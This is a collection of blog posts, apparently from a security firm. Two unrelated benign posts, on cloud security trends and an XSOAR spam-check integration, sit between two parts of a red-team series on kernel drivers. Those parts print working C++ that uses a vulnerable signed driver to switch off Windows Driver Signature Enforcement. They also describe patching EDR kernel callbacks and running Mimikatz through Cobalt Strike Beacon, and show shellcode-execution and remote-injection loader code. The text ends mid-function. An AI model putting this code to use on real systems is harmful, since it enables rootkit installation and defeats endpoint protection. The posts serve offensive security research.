InitializeObjectAttributes(&oa, &DriverImagePath, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtDeleteFile(&oa);

4. A touch of black magic and a sprinkle of luck

Now that I’m able to load and unload a signed driver, it’s time to figure out how to tackle DSE.

Driver Signature Enforcement is part of Windows Code Integrity (CI) and, depending on the Windows build version, it lives in ntoskrnl.exe or CI.dll as a global, non-exported variable (flag). Before Windows 8.1 (build 9600), the DSE flag is located in ntoskrnl.exe as nt!g_CiEnabled, a global boolean that toggles DSE on or off. On more recent builds, the DSE flag can be found in CI.dll as CI!g_CiOptions, a combination of flags (0x0 = disabled, 0x6 = enabled, 0x8 = test mode).
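Going by those flag values, a tiny helper to interpret a g_CiOptions value read from kernel memory could look like this (the helper is mine and only covers the three values listed above; anything else is treated as unknown):

```cpp
#include <string>

// Interpret the g_CiOptions flag combination described above:
// 0x0 = DSE disabled, 0x6 = DSE enabled, 0x8 = test signing mode.
static std::string DescribeCiOptions(unsigned long value) {
    switch (value) {
        case 0x0: return "disabled";
        case 0x6: return "enabled";
        case 0x8: return "test mode";
        default:  return "unknown";
    }
}
```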

For a more detailed write-up or insight into DSE I recommend A quick insight into Driver Signature Enforcement by @j00ru, Capcom Rootkit Proof-Of-Concept by @FuzzySec and Loading unsigned Windows drivers without reboot by @vikingfr.

In a nutshell, the idea is to (ab)use a vulnerable signed driver with an arbitrary kernel memory read/write exploit, locate either the g_CiEnabled or g_CiOptions variable in kernel memory, and overwrite its value with 0x0 to disable DSE. Once DSE is disabled, the malicious driver can be loaded, after which the DSE value should be restored as soon as possible, because it is protected by PatchGuard. Sounds relatively straightforward, you might say; however, the hard part is locating g_CiEnabled or g_CiOptions, because even though we know where to go looking, they are not exported, so we will need to perform offset calculations.

Since in theory any vulnerable driver with the ability to read/write kernel memory can be used, I won’t be covering the specifics of my vulnerable driver. I relied heavily on KDU’s source code for the implementation of locating g_CiEnabled / g_CiOptions. A lot of code is copied directly from KDU and slightly modified to adjust for a single vulnerable driver, use lower-level API calls or direct syscalls, and be more readable overall.

Starting from the top, I have a function ControlDSE() responsible for toggling the DSE value. This function calls QueryVariable() which returns the address in memory of the DSE variable and then calls the vulnerable driver via the DriverReadVirtualMemory() and DriverWriteVirtualMemory() functions to control the DSE value.

NTSTATUS ControlDSE(HANDLE DeviceHandle, ULONG buildNumber, ULONG DSEValue) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	ULONG_PTR variableAddress;
	ULONG flags = 0;

	// locate the address in memory of the DSE variable
	variableAddress = QueryVariable(buildNumber);
	if (variableAddress == 0)
		return STATUS_NOT_FOUND;

	DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
	if (DSEValue == flags) // current DSE value equals the DSE value we want to set
		return STATUS_SUCCESS;

	status = DriverWriteVirtualMemory(DeviceHandle, variableAddress, &DSEValue, sizeof(DSEValue));
	if (NT_SUCCESS(status)) {
		// confirm the new DSE value is written to memory
		flags = 0;

		DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
		if (flags == DSEValue)
			printf("New DSE value set\n");
		else
			printf("Failed to set new DSE value\n");
	}
	return status;
}

To locate the address of the DSE variable in memory, QueryVariable() first retrieves the base address of the loaded module in kernel space. Under the hood, GetModuleBaseByName() uses NtQuerySystemInformation() with the SystemModuleInformation information class to retrieve a list of loaded modules and then performs a basic string comparison until it has found the module it’s looking for. Next, QueryVariable() maps a copy of the module into its own virtual memory, which is later used to calculate offsets, and calls QueryCiEnabled() or QueryCiOptions() respectively depending on the build number.

ULONG_PTR QueryVariable(ULONG buildNumber) {
	NTSTATUS status;
	ULONG loadedImageSize = 0;
	SIZE_T sizeOfImage = 0;
	ULONG_PTR result = 0, imageLoadedBase, kernelAddress = 0;
	const char* moduleNameA = nullptr;
	PCWSTR moduleNameW = nullptr;
	HMODULE mappedImageBase;

	WCHAR szFullModuleName[MAX_PATH * 2];

	if (buildNumber < 9600) { // before Windows 8.1
		moduleNameA = "ntoskrnl.exe";
		moduleNameW = L"ntoskrnl.exe";
	}
	else {
		moduleNameA = "CI.dll";
		moduleNameW = L"CI.dll";
	}

	// get the base address of the module loaded in kernel space
	imageLoadedBase = GetModuleBaseByName(moduleNameA, &loadedImageSize);
	if (imageLoadedBase == 0)
		return 0;

	szFullModuleName[0] = 0;
	if (!GetSystemDirectory(szFullModuleName, MAX_PATH))
		return 0;

	wcscat_s(szFullModuleName, MAX_PATH * 2, L"\\");
	wcscat_s(szFullModuleName, MAX_PATH * 2, moduleNameW);

	// map a local copy of the module
	mappedImageBase = LoadLibraryEx(szFullModuleName, nullptr, DONT_RESOLVE_DLL_REFERENCES);
	if (mappedImageBase == nullptr)
		return 0;

	if (buildNumber < 9600) {
		status = QueryImageSize(mappedImageBase, &sizeOfImage);

		if (NT_SUCCESS(status)) {
			// calculate offsets and find g_CiEnabled address
			status = QueryCiEnabled(mappedImageBase, imageLoadedBase, &kernelAddress, sizeOfImage);
		}
	}
	else {
		// calculate offsets and find g_CiOptions address
		status = QueryCiOptions(mappedImageBase, imageLoadedBase, &kernelAddress, buildNumber);
	}

	if (NT_SUCCESS(status)) {
		// verify the found address lies within the memory range of the module loaded in kernel space
		if (IN_REGION(kernelAddress, imageLoadedBase, loadedImageSize))
			result = kernelAddress;
	}

	return result;
}

The QueryCiEnabled() and QueryCiOptions() functions perform the actual black magic of calculating the right offsets using the kernel module and the locally mapped copy. QueryCiOptions() makes use of the Hacker Disassembler Engine 64 (modified to be a single C/C++ header file) to inspect the assembly instructions and calculate the right offset. Once the local offset has been calculated and stored in the ptrCode variable, the actual address is calculated by adding the local offset to the kernel module base address and subtracting the base address of the locally mapped copy.
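That final rebasing step is plain pointer arithmetic: the variable sits at the same offset in the locally mapped copy as in the kernel-loaded image. A self-contained illustration with made-up base addresses (the helper name is mine):

```cpp
#include <cstdint>

// Translate a pointer inside a locally mapped copy of a module to the
// corresponding address inside the kernel-loaded instance: the offset
// from the image base is identical in both mappings.
static uint64_t RebaseToKernel(uint64_t kernelBase, uint64_t mappedBase, uint64_t mappedPtr) {
    return kernelBase + (mappedPtr - mappedBase);
}
```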

NTSTATUS QueryCiOptions(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, ULONG buildNumber) {
	PBYTE ptrCode = nullptr;
	ULONG offset, k, expectedLength;
	LONG relativeValue = 0;
	ULONG_PTR resolvedAddress = 0;

	hde64s hs;

	*ResolvedAddress = 0ULL;

	ptrCode = (PBYTE)GetProcAddress(ImageMappedBase, (PCHAR)"CiInitialize");
	if (ptrCode == nullptr)
		return STATUS_PROCEDURE_NOT_FOUND;

	RtlSecureZeroMemory(&hs, sizeof(hs));
	offset = 0;

	if (buildNumber < 16299) {
		expectedLength = 5;

		do {
			hde64_disasm(&ptrCode[offset], &hs);
			if (hs.flags & F_ERROR)
				break;

			if (hs.len == expectedLength) { //test if jmp
				// jmp CipInitialize
				if (ptrCode[offset] == 0xE9) {
					relativeValue = *(PLONG)(ptrCode + offset + 1);
					break;
				}
			}
			offset += hs.len;
		} while (offset < 256);
	}
	else {
		expectedLength = 3;

		do {
			hde64_disasm(&ptrCode[offset], &hs);
			if (hs.flags & F_ERROR)
				break;

			if (hs.len == expectedLength) {
				// Parameters for the CipInitialize.
				k = CheckInstructionBlock(ptrCode, offset);

				if (k != 0) {
					expectedLength = 5;
					hde64_disasm(&ptrCode[k], &hs);
					if (hs.flags & F_ERROR)
						break;
					// call CipInitialize
					if (hs.len == expectedLength) {
						if (ptrCode[k] == 0xE8) {
							offset = k;
							relativeValue = *(PLONG)(ptrCode + k + 1);
							break;
						}
					}
				}
			}
			offset += hs.len;
		} while (offset < 256);
	}

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
	relativeValue = 0;
	offset = 0;
	expectedLength = 6;

	do {
		hde64_disasm(&ptrCode[offset], &hs);
		if (hs.flags & F_ERROR)
			break;

		if (hs.len == expectedLength) { //test if mov
			if (*(PUSHORT)(ptrCode + offset) == 0x0d89) {
				relativeValue = *(PLONG)(ptrCode + offset + 2);
				break;
			}
		}
		offset += hs.len;
	} while (offset < 256);

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
	// calculate the actual address in kernel space by adding the offset
	// and subtracting the base address of the locally mapped copy
	// from the kernel module base address
	resolvedAddress = ImageLoadedBase + ptrCode - (PBYTE)ImageMappedBase;

	*ResolvedAddress = resolvedAddress;
	return STATUS_SUCCESS;
}

QueryCiEnabled() uses a hardcoded value of 0x1D8806EB to calculate and resolve the offset.

NTSTATUS QueryCiEnabled(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, SIZE_T SizeOfImage) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	SIZE_T c;
	LONG rel = 0;

	*ResolvedAddress = 0;

	for (c = 0; c < SizeOfImage - sizeof(DWORD); c++) {
		if (*(PDWORD)((PBYTE)ImageMappedBase + c) == 0x1d8806eb) {
			rel = *(PLONG)((PBYTE)ImageMappedBase + c + 4);
			*ResolvedAddress = ImageLoadedBase + c + 8 + rel;
			status = STATUS_SUCCESS;
			break;
		}
	}
	return status;
}

5. Conclusion

Programmatically loading drivers has its challenges, but it goes to show if you’re willing to mess around in memory a bit, Windows security components can be bypassed with relative ease. A lot of existing research and exploits are already out there and Microsoft has put in little effort to mitigate them or update existing functionality like Code Integrity to be better protected against attacks. Even if additional patches have fixed certain issues, chaining different exploits together still gets the job done.

I’m still busy investigating the exact workings of QueryCiEnabled() and QueryCiOptions() as I would like to remove dependencies on hardcoded offsets or external libraries/tools like Hacker Disassembler Engine 64. Once this process is complete, I can move on to optimizing code for OPSEC purposes, for example implementing direct syscalls as much as possible, and then convert the final result to a Beacon Object File for Cobalt Strike.


4 Trends for Cloud Security in 2022

7 February 2022 at 13:25

The migration from an on-premises environment towards the public cloud started years ago and is still going on. Both governmental agencies and business organizations are on a journey of migrating and maturing their cloud environments, pulled by the compelling need for streamlining, scaling, and improving their production.

It probably won’t come as a surprise that moving to the cloud brings new security challenges, and the more cloud environments grow, the more new concerns will arise. The main question that comes up is: are you properly protecting your cloud and its data against breaches caused by an insecure configuration?

In this blogpost, we will try to answer that question by formulating several key steps to ensure that a cloud environment is securely configured. From our experience as cloud security consultants, we notice that many organizations have already started down this road in one way or another, but struggle to reach the maturity of a structured approach combined with the required expertise.

Continuous Security Assessments

For those who started using and securing the cloud a while ago, misconfigurations are something everyone is aware of today. However, they still happen very frequently, even in companies that have had a Cloud-First strategy for years. The IBM Cost of a Data Breach Report 2021 even lists cloud misconfigurations as the third most common initial attack vector for data breaches, after compromised credentials and phishing. It is therefore essential for an organization to spot existing flaws and new misconfigurations on a timely basis. An effective method to understand the state at a certain point in time is performing cloud security assessments or configuration reviews. If these are executed periodically, an organization can compare them with previous reviews and confirm that the most critical findings have been solved.

There are several sources of security best practices, benchmarks, and checklists against which public cloud customers can rate their cloud security posture. Widely used benchmarks are those of the Center for Internet Security (CIS), which we extended with additional best practices and controls for our own cloud security assessments.

Some of the key topics we review during our Cloud Security Assessments.

Despite this, such assessments do not offer a real-time overview but are rather a snapshot of the configuration at a certain moment in time. Furthermore, these analyses are often based on sample checks, not on the entire environment. The purpose is to make Operations and Security Operations teams aware of what is wrongly configured and what represents a threat to the company. But what happens after the assessment? How do you ensure those flaws do not come back when creating new cloud environments? Will you learn the lesson and improve your security by design while engineering your environment? How?

Cloud Policies Deployment

With this in mind, cloud security took a step forward. In short, security experts started creating policies to monitor security and compliance across their cloud environments in an automated way. This is usually done via native tools like Azure Policy for Microsoft Azure, AWS Config for Amazon Web Services, and Google Security Command Center for Google Cloud Platform.

Native policy management solutions on major public cloud providers.

The benefit is huge: thanks to proper policies, one can manage compliance in the cloud by centralizing rules and adapting them to different purposes, for example, depending on production, corporate, sandbox environments, etc. Note that a basic set of policies from several of the largest frameworks and benchmarks (e.g., CIS Benchmark) can be configured out-of-the-box for the three largest cloud providers.

In this way, you will get more visibility and, in some cases, be able to automate remediation of violations or enforce security controls.

If your organization today has a fully implemented policy compliance monitoring setup, you can breathe a sigh of relief, but there is still work to do! Policies need to be reviewed, updated and extended when necessary. Most importantly, the tools offered by the major public providers are limited in their applicability to multi-cloud environments (for instance, Azure Policy can only onboard AWS accounts, not GCP or others).

How do you extend the same policies from one tenant to another? If you are using more than one provider, how difficult is it to re-adapt policies throughout your entire environment? Things might even get more complicated over the next years, when policies need updates and continuous maintenance.

Replicability of your Secure Cloud Setup

As part of security improvements, leveraging Infrastructure as Code (IaC) can be a significant step towards deploying new cloud resources using Security and Compliance by design. IaC is not an only-security solution, but its usage in security is today highly recommended.

Specifically, it becomes fundamental when an organization relies on multiple tenants across the globe, making it almost impossible to maintain centralized visibility and ensure cross-tenant compliance.

What exactly is IaC used for in cloud security? IaC allows you to codify your resource setup according to, among others, security best practices. By reusing this code, you can maintain your desired level of security and configuration, treating the codified configuration as your minimum security baseline. This can streamline the deployment of new environments and improve control over existing cloud workspaces.

Although public cloud providers offer their own built-in solutions (see Azure Resource Manager, AWS CloudFormation and Google Cloud Deployment Manager), there are top-quality external IaC tools that work seamlessly with Azure, GCP and AWS, for instance HashiCorp Terraform, VMware SaltStack or Red Hat Ansible.

Some of the most common open-source solutions for Infrastructure as Code used to create cloud environments.

The challenge of multi-cloud protection

So, what is next? Did you really tick all the checkboxes? That is already incredibly good! But as business needs and features evolve, so do the cloud and its security.

More and more organizations are moving towards a multi-cloud structure, meaning that rather than relying on only one public cloud provider, they are investing in at least a second solution. The reasons for this are multiple: an exit strategy, a third backup copy, different levels of cloud provider expertise in different geographical areas, and so on.

What really matters from a security perspective is that working with multiple cloud providers adds an extra layer of challenges, as we need to ensure that similar security standards and compliance modules are respected across different platforms. This is something few tools can ensure, due to the lack of interconnectivity across solutions and of the specific features necessary for such a particular scenario.

This is where Cloud Security Posture Management (CSPM) comes in.

None of the security tools mentioned so far replaces the previous ones; rather, they complement each other, each adding a further layer of prevention, detection and response to security misconfigurations and breaches in the cloud.

The ultimate solution to manage security misconfigurations, secure policy setup and cross-cloud security management is CSPM.

What exactly is Cloud Security Posture Management?

According to Gartner’s definition, CSPM is a new category of security products that help improve visibility, centralize security monitoring, automate responses and provide compliance assurance in the cloud.

Although Gartner’s article dates back two years and CSPM has been on the market for a while, now is the right moment to start planning its deployment proactively, to avoid losing control over multi-tenant, hybrid and multi-cloud environments.

2022 will be an important year for cybersecurity and for the cloud: working habits adopted during the emergency of the pandemic are consolidating, pushing the work environment towards an ever more decentralized and remotely connected network. Cross-country collaborations and shared working and production environments find fertile ground in the cloud and in its complex, articulated deployments.

In light of this, tools that facilitate and streamline our work while maintaining and improving a strong security posture are crucial for the seamless progression of the business world.

In conclusion

Depending on your security maturity, one of the steps described here may be the milestone you are currently working towards. Nevertheless, it is important to plan what comes next and act proactively towards deploying the right solutions, pairing production needs with their related security concerns and tackling them in advance.

At NVISO we observe different levels of maturity across our customers and, in light of this, consider Policies, IaC templates and CSPM the goals we will have to work hard on together in the coming year.

About the author

Alfredo is a senior consultant in the Cloud Security team and solution lead of Cloud Governance Services. He has extensive knowledge of Microsoft security solutions, applied to Azure and the Microsoft 365 suite. On top of that, Alfredo is keen on cloud solution innovations, which has led him to develop in-depth knowledge of several solutions on the market related to the most modern and secure ways to keep cloud infrastructure safe from threats.

You can reach Alfredo via his LinkedIn page.

Automated spam detection in Palo Alto Cortex XSOAR

By: wstinkens
21 February 2022 at 13:05


With our Managed Detect and Respond (MDR) service at NVISO we provide a managed Security Operations Center (SOC) for a large variety of clients across different industries. In our SOC, we rely heavily on automations performed by our SOAR platform Palo Alto Cortex XSOAR to minimize the manual tasks that need to be done by our SOC analysts. With our “automation first” principle, we have automated most L1 analysis tasks, allowing our analysts to focus on actionable security alerts and detect attackers faster in our customers’ environments.

User Reported Phishing

A common problem for all our clients is phishing emails. This is still the most common initial attack vector for successful intrusions into a corporate environment. Through awareness campaigns, users are educated about the risks of phishing emails and how to spot them. In these trainings, they are encouraged to report suspicious emails for analysis.

As a part of the NVISO MDR service, we offer a managed phishing option to review all user-reported phishing emails. If automated analysis and manual review by a SOC analyst have determined that a reported email is a true positive, the phishing mail is deleted from all user mailboxes across the entire organization.

What we have seen in our SOC is that even though users have been educated on how to spot phishing emails, it is still difficult for them to distinguish phishing from spam. We estimate that over 70% of user-reported phishing mails are actually spam. As each mail is still manually verified by a SOC analyst after automated analysis, this generates a high workload in our SOC.

Automated Spam Detection

To decrease the workload of our SOC analysts, we have implemented an automated spam check against a privately hosted email sandbox. This sandbox has a built-in SpamAssassin deployment which returns a spam score. SpamAssassin is the #1 Open Source anti-spam platform maintained by the Apache Software foundation and is widely used to filter emails and block spam.

If the spam score is above a certain threshold, we can confidently say that the mail is spam. We automatically inform the user about the difference between spam and phishing and close the incident without any manual actions required.

Postmark Spamcheck XSOAR Integration

To enable you to implement this workflow yourself without the complex task of setting up and operating a SpamAssassin infrastructure, NVISO has created a Postmark Spamcheck XSOAR integration which you can use to get the Spam score of emails.

In this integration, we make use of the free public SpamCheck API created by Postmark:

This API allows you to send EML files to the Postmark SpamAssassin infrastructure without any cost for you.

The integration is available on the Cortex XSOAR marketplace and on the Demisto Github repository:

The integration documentation can be found in the Cortex XSOAR documentation:

Integration Setup

Open the Cortex XSOAR Marketplace, search for Postmark Spamcheck and install the integration:

Once installed, open Settings in XSOAR, Open the integrations tab and search for Postmark Spamcheck:

Click Add instance and set the name; leave the other settings at their default values.

Click Test to verify connectivity and click Save & exit:

The integration is now setup and ready for use.

Integration Usage

To get the spam score of an email, you will first need to have it available as an EML file in Cortex XSOAR. To do this you can use an integration such as EWS O365 from the EWS content pack to pull emails from a mailbox in Exchange Online.

Execute the following command to list emails available in the configured mailbox:

!ews-search-mailbox query="*"  selected-fields="subject"
!ews-search-mailbox results

Because reported phishing emails are added to the mail as an attachment, we need to retrieve the attachment using the mail’s itemId:

!ews-get-attachment item-id="AAMkADcwYmI0ZjcwLTI2NzItNDNhYi05N2Y5LThlZDkxOWUyZWE0YwBGAAAAAADtD+ENzUZfQ7HIUnhsJ9tOBwCOoK5ZS6vGTLYi98YtY9nrAAAAAAEMAACOoK5ZS6vGTLYi98YtY9nrAAEYi07gAAA="
!ews-get-attachment result

The entryID of the retrieved attachment is available in the Context Data:

Context Data

To only get the spam score of the reported phishing mail, execute the following command:

!postmark-spamcheck [email protected] short=True
!postmark-spamcheck result

To get a full report with all the SpamAssassin rules that were hit, execute the following command:

!postmark-spamcheck [email protected]
!postmark-spamcheck result

The results of the postmark-spamcheck are also available in the Context Data, which can be used in playbooks:

Context Data

Based on the score returned by the postmark-spamcheck you can determine a threshold where you can confidently say that the reported phishing email is spam and take actions in your playbook accordingly.
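As a purely illustrative sketch (in a real deployment, this decision would live in an XSOAR playbook conditional task, not in C++ code), the logic boils down to a single comparison against the chosen cutoff. SpamAssassin's conventional default threshold is 5.0, but the right value for confidently auto-closing incidents should be derived from your own data:

```cpp
// Hypothetical sketch of the thresholding decision. The 5.0 default mirrors
// SpamAssassin's conventional cutoff; for auto-closing incidents you will
// likely want a higher, data-driven threshold.
bool IsSpam(double spamScore, double threshold = 5.0) {
    return spamScore >= threshold;
}
```

In a playbook, this maps to a conditional task on the score field available in the Context Data.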


In this blog post we introduced the free open-source Postmark Spamcheck integration for Palo Alto Cortex XSOAR, created by the NVISO SOAR engineering team. This integration can be used in your playbooks for automated handling and analysis of reported phishing mails to determine their spam score and reduce the analyst workload in your SOC.

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead, he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR engineering team, enabling the NVISO SOC analysts to detect attackers faster in customer environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase the operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.

Kernel Karnage – Part 9 (Finishing Touches)

22 February 2022 at 13:03

It’s time for the season finale. In this post we explore several bypasses but also look at some mistakes made along the way.

1. From zero to hero: a quick recap

As promised in part 8, I spent some time converting the application to disable Driver Signature Enforcement (DSE) into a Beacon Object File (BOF) and adding in some extras, such as string obfuscation to hide very common string patterns like registry keys and constants from network inspection. I also changed some of the parameters to work with user input via CobaltWhispers instead of hardcoded values and replaced some notorious WIN32 API functions with their Windows Native API counterparts.

Once this was done, I started debugging the BOF and testing the full attack chain:

  • starting with the EarlyBird injector being executed as Administrator
  • disabling DSE using the BOF
  • deploying the Interceptor driver to cripple EDR/AV
  • running Mimikatz via Beacon.

The full attack is demonstrated below:

2. A BOF a day, keeps the doctor away

With my internship coming to an end, I decided to focus on Quality of Life updates for the InterceptorCLI as well as convert it into a Beacon Object File (BOF) in addition to the DisableDSE BOF, so that all the components may be executed in memory via Beacon.

The first big improvement is to rework the commands to be more intuitive and convenient. It’s now possible to provide multiple values to a command, making it much easier to patch multiple callbacks. Even if that’s too much manual labour, the -patch module command will take care of all callbacks associated with the provided drivers.

Next, I added support for vendor recognition and vendor based actions. The vendors and their associated driver modules are taken from SadProcessor’s Invoke-EDRCheck.ps1 and expanded by myself with modules I’ve come across during the internship. It’s now possible to automatically detect different EDR modules present on a target system and take action by automatically patching them using the -patch vendor command. An overview of all supported vendors can be obtained using the -list vendors command.
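To illustrate how vendor-based actions like -patch vendor can be structured (a sketch with made-up vendor and module names, not Interceptor's real list), a simple lookup table from vendor to associated driver modules suffices:

```cpp
#include <map>
#include <string>
#include <vector>

// Illustrative mapping of EDR vendor -> kernel driver modules whose callbacks
// should be patched. All names below are placeholders for demonstration.
std::map<std::string, std::vector<std::string>> g_vendorModules = {
    { "ExampleVendorA", { "examplea_drv1.sys", "examplea_drv2.sys" } },
    { "ExampleVendorB", { "exampleb_flt.sys" } },
};

// Resolve the module list for a vendor; empty if the vendor is unknown.
std::vector<std::string> ModulesForVendor(const std::string& vendor) {
    auto it = g_vendorModules.find(vendor);
    return it != g_vendorModules.end() ? it->second : std::vector<std::string>{};
}
```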

Finally, I converted the InterceptCLI client into a Beacon Object File (BOF), enhanced with direct syscalls and integrated in my CobaltWhispers framework.

3. Bigger fish to fry

With $vendor2 defeated, it’s also time to move on to more advanced testing. Thus far, I’ve only tested against consumer-grade Anti-Virus products and not enterprise EDR/AV platforms. I spent some time setting up and playing with $EDR-vendor1 and $EDR-vendor2.

To my surprise, once I had loaded the Interceptor driver, $EDR-vendor2 would detect that a new driver had been loaded, most likely using ImageLoad callbacks, and refresh its own modules to restore protection and undo any potential tampering. Subsequently, any I/O requests to Interceptor are blocked by $EDR-vendor2, resulting in an "Access denied" message. The current version of InterceptorCLI makes use of various WIN32 API calls, including DeviceIoControl(), to contact Interceptor. I suspect $EDR-vendor2 uses a minifilter to inspect and block I/O requests rather than relying on user land hooks, but I’ve yet to confirm this.

Contrary to $EDR-vendor2, I ran into issues getting $EDR-vendor1 to work properly with the $EDR-vendor1 platform and generate alerts, so I moved on to testing against $vendor3 and $EDR-vendor3. My main testing goal is the Interceptor driver itself and its ability to hinder the EDR/AV. The method of delivering and installing the driver is less relevant.

Initially, after patching all the callbacks associated with $vendor3, my EarlyBird-injector-spawned process would crash, resulting in no Beacon callback. The cause of the crash is klflt.sys, which I assume is $vendor3’s filesystem minifilter or at least part of it. I haven’t pinpointed the exact reason for the crash, but I suspect it is related to handle access rights.

When restoring klflt.sys callbacks, EarlyBird is executed and Beacon calls back successfully. However, after a notable delay, Beacon is detected and removed. Apart from detection upon execution, my EarlyBird injector is also flagged when scanned. Since I’ve used the same compiled version of my injector for several weeks against several different vendors, combined with other monitoring software like ProcessHacker2, it’s possible that samples have been submitted and analyzed by different sandboxes.

In an attempt to get around klflt.sys, I decided to try a different injection approach and stick to my own process.

void main() {
	// raw Beacon shellcode blob omitted
	const unsigned char shellcode[] = "";
	PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
	DWORD threadID;
	HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
	WaitForSingleObject(hThread, INFINITE);
}

These few lines of primitive shellcode injection were successful in bypassing klflt.sys and executing Beacon.

4. Rookie mistakes

When I started my tests against $EDR-vendor3, the first thing that happened wasn’t alarms and sirens going off, it was a good old bluescreen. During my kernel callbacks patching journey, I never considered the possibility of faulty offset calculations. The code responsible for calculating offsets just happily adds up the addresses with the located offset and returns the result without any verification. This had worked fine on my Windows 10 build 19042 test machine, but failed on the $EDR-vendor3 machine which is a Windows 10 build 18362.

for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
	if (*(PUCHAR)instructionAddr == OPCODE_LEA_R13_1[g_WindowsIndex] && 
		*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] &&
		*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_R13_3[g_WindowsIndex]) {

		OffsetAddr = 0;
		memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
		return OffsetAddr + 7 + instructionAddr;
	}
}

If we look at the kernel base address 0xfffff807'81400000, we can expect the address of the kernel callback arrays to be in the same range as the first 8 most significant bits (0xfffff807).

However, comparing the debug output to the expected address, we can note that the return address (callback array address) 0xfffff808'81903ba0 differs from the expected return address 0xfffff807'81903ba0 by a value of 0x100000000 or compared to the kernel base address 0x100503ba0. The 8 most significant bits don’t match up.

The calculated offset we’re working with in this case is 0xffdab4f7. Following the original code, we add 0xffdab4f7 + 0x7 + 0xfffff80781b586a2, which yields the callback array address. This is where the issue resides: OffsetAddr is a ULONG64, in other words an "unsigned long long", which comes down to 0x00000000'00000000 when initialized to 0. When the memcpy() instruction copies over the offset address bytes, the result becomes 0x00000000'ffdab4f7, so the negative 32-bit displacement is never sign-extended. To quickly solve this problem, I changed OffsetAddr to a LONG and added a function to verify the address calculation against the kernel base address.
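The arithmetic is easy to reproduce in user land. The sketch below (my own illustration, not driver code) contrasts the zero-extended and sign-extended interpretation of the same 4-byte displacement on a little-endian x64 machine, using the values from the debug output above:

```cpp
#include <cstdint>
#include <cstring>

// Zero-extended variant (the original bug): memcpy'ing 4 bytes into a
// zero-initialized 64-bit unsigned integer leaves the upper 32 bits zero,
// so a negative displacement like 0xffdab4f7 is treated as a huge positive
// value and the sum overshoots by exactly 0x100000000.
uint64_t resolve_unsigned(uint64_t instructionAddr, uint32_t rawOffset) {
    uint64_t offset = 0;
    std::memcpy(&offset, &rawOffset, 4); // little-endian copy, no sign extension
    return offset + 7 + instructionAddr;
}

// Sign-extended variant (the fix): reinterpreting the displacement as a
// signed 32-bit value and widening it to 64 bits before the addition.
uint64_t resolve_signed(uint64_t instructionAddr, uint32_t rawOffset) {
    int32_t offset = 0;
    std::memcpy(&offset, &rawOffset, 4); // same bytes, signed interpretation
    return (int64_t)offset + 7 + instructionAddr;
}
```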

ULONG64 VerifyOffsets(LONG OffsetAddr, ULONG64 InstructionAddr) {
	ULONG64 ReturnAddr = OffsetAddr + 7 + InstructionAddr;
	ULONG64 KernelBaseAddr = GetKernelBaseAddress();
	if (KernelBaseAddr != 0) {
		if (ReturnAddr - KernelBaseAddr > 0x1000000) {
			KdPrint((DRIVER_PREFIX "Mismatch between kernel base address and expected return address: %llx\n", ReturnAddr - KernelBaseAddr));
			return 0;
		}
		return ReturnAddr;
	}
	else {
		KdPrint((DRIVER_PREFIX "Unable to get kernel base address\n"));
		return 0;
	}
}

5. Final round

As expected, $EDR-vendor3 is a big step up from the regular consumer grade anti-virus products I’ve tested against thus far, and the loader I’ve been using during this series doesn’t cut it anymore. Right around the time I started my tests I came across a tweet from @an0n_r0 discussing a semi-successful $EDR-vendor3 bypass, so I used this as the base for my new stage 0 loader.

The loader is based on the simple remote code injection pattern using the VirtualAllocEx, WriteProcessMemory, VirtualProtectEx and CreateRemoteThread WIN32 APIs.

void* exec = fpVirtualAllocEx(hProcess, NULL, blenu, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

fpWriteProcessMemory(hProcess, exec, bufarr, blenu, NULL);

DWORD oldProtect;
fpVirtualProtectEx(hProcess, exec, blenu, PAGE_EXECUTE_READ, &oldProtect);

fpCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec, exec, 0, NULL);

I also incorporated dynamic function imports using hashed function names and CIG to protect the spawned suspended process against injection of non-Microsoft-signed binaries.
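To sketch the hashed-import part (the loader's actual hash routine may differ; the classic djb2 hash is shown purely for illustration): instead of an import table entry or a GetProcAddress call with a plaintext API name, the loader stores only a hash and, at runtime, walks a module's export table hashing each export name until one matches.

```cpp
#include <cstdint>

// Illustrative djb2-style hash over an API name. A loader using hashed
// imports stores only HashApiName("VirtualAllocEx") at compile time and
// compares it against the hash of each export name at resolution time,
// keeping the plaintext string out of the binary.
uint32_t HashApiName(const char* name) {
    uint32_t hash = 5381;
    while (*name)
        hash = hash * 33 + (uint8_t)*name++; // djb2: h = h * 33 + c
    return hash;
}
```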

HANDLE SpawnProc() {
    STARTUPINFOEXA si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    SIZE_T attributeSize;
    // CIG: block non-Microsoft-signed binaries from loading into the child process
    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;

    InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
